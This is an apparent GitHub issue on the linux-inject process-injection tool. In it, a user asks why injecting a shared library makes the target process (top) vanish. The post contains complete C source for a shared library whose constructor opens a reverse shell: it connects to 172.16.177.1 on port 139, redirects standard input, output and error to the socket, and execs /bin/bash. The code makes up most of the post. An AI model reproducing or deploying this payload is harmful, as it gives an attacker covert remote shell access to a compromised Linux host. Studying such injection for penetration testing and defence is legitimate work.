linux-inject
linux-inject copied to clipboard
gaffe23
kill injected process
hello,thanks for your code.
im a pentest noob,when i test this programmer,i find a issue. i rewrite the sample-library.c to back connect to my host,when i inject the .so to a normal process(like top),inject success and i received a reverse shell,but, the top process disappear,the pid dont change,but the process cmdline changed to /bin/bash,i think sample-library.c cause this.so could you please help me?this is my sample-library.c:
#include <stdio.h> #include <dlfcn.h> #include <stdlib.h> #include <pthread.h> #include <stdio.h> #include <sys/types.h> #include <sys/socket.h> #include <unistd.h> #include <fcntl.h> #include <stdio.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <netdb.h>
static void * hello() { struct sockaddr_in server; int sock; char shell[]="/bin/bash"; if((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) { return NULL; }
server.sin_family = AF_INET;
server.sin_port = htons(139);
server.sin_addr.s_addr = inet_addr("172.16.177.1");
if(connect(sock, (struct sockaddr *)&server, sizeof(struct sockaddr)) == -1) {
return NULL;
}
dup2(sock, 0);
dup2(sock, 1);
dup2(sock, 2);
execl(shell,"/bin/bash",(char *)0);
close(sock);
printf("I just got loaded\n");
return NULL;
}
attribute((constructor)) void loadMsg() { pthread_t thread_id; pthread_create(&thread_id,NULL,hello,NULL); }
